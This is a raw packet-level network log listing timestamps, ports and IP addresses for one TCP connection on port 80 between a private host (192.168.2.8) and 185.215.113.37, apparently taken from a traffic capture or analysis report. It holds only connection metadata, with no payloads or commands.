Sep 26, 2024 06:00:22.071001053 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071012020 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071019888 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071027040 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071036100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071047068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071054935 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071063995 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071079016 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071084976 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071098089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071105957 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071115971 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071140051 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071156025 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071183920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071218014 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071227074 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071244955 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071260929 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071276903 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071307898 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071327925 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071338892 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071357965 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071367025 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071376085 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071393967 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071400881 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071413040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071423054 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071433067 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071440935 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071453094 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071460962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071472883 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071480989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071502924 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071516037 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071521044 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071537971 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071552038 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071558952 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071568966 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071577072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071583986 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071593046 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071604013 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071615934 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071626902 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071640015 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071649075 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071659088 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071671009 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071688890 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071688890 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071698904 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071706057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071717024 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071727037 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071738958 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071753025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071762085 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071772099 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071777105 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071787119 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071796894 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071815014 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071822882 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071830034 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071840048 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071855068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071861982 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071871996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071887970 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071893930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071909904 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071921110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071929932 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071938992 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071950912 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.071959972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071969986 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071980000 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.071990967 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072000027 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072006941 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072020054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072032928 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072037935 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072048903 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072060108 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072066069 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072078943 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072084904 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072096109 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072107077 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072113991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072128057 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072134018 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072145939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072155952 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072166920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.072192907 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072216034 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.072556019 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.073364019 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.075984001 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.076035023 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.076056957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.076179028 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.076948881 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077001095 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077619076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077641010 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077653885 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077662945 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077676058 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077686071 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077693939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077707052 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077718973 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077744961 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077837944 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077848911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077861071 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077868938 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077883005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077888966 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077898026 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077904940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077914953 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077930927 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077939987 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077949047 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077960968 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.077970028 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077986002 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.077995062 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078002930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078013897 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078025103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078032970 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078046083 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078052998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078063011 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078069925 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078077078 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078087091 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078099966 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078107119 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078116894 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078124046 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078140974 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078145981 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078161001 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078166962 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078175068 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078196049 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078201056 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078210115 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078222036 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078231096 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078244925 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078249931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078260899 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078267097 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078277111 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078284979 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078299046 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078305006 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078315020 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078321934 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078330040 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078350067 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078357935 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078367949 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078380108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078387976 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078402996 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078408957 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078418970 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078427076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078433990 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078443050 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078464985 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078470945 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078479052 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078504086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078510046 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078528881 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078536987 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078546047 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078557014 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078567028 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078579903 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078584909 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078596115 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078602076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078615904 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078620911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078639030 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078645945 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078659058 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078664064 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078680038 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078686953 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078710079 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078727961 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078752995 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078764915 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078778028 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078795910 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078804970 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078815937 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078823090 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078833103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078852892 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078862906 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078872919 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078887939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078900099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078913927 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078929901 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078938007 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078948975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078962088 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078969955 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078979969 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.078991890 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.078998089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079009056 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079018116 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079027891 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079039097 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079046965 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079057932 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079068899 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079077005 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079087019 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079096079 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079108000 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079118967 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079127073 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079138041 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079149008 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079157114 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079169035 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079176903 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079185963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079194069 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079204082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079216957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079226017 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079246998 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079252958 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079262972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079272985 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079284906 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079293013 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079303980 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079309940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079322100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079328060 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079338074 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079345942 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079358101 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079365015 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079375029 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079389095 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079396963 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079416037 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079421997 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079432964 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079443932 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079452038 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079466105 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079477072 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079484940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079499960 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079509974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079530954 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079536915 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079549074 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079554081 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079566002 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079571962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079580069 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079590082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079602957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079610109 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079627037 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079632998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079647064 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079653978 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079660892 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079684019 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079690933 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079710960 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079724073 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079742908 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079797983 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079809904 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079821110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079833984 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079842091 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079852104 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079864025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079869986 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079879999 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079889059 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079899073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079909086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079917908 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079926014 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079936981 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079947948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079958916 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079967022 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079977989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.079986095 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.079994917 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.080004930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.080014944 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.080028057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.080035925 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.080044985 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.080056906 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.080064058 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.080075979 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.080084085 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.080094099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.080105066 CEST	80	49704	185.215.113.37	192.168.2.8
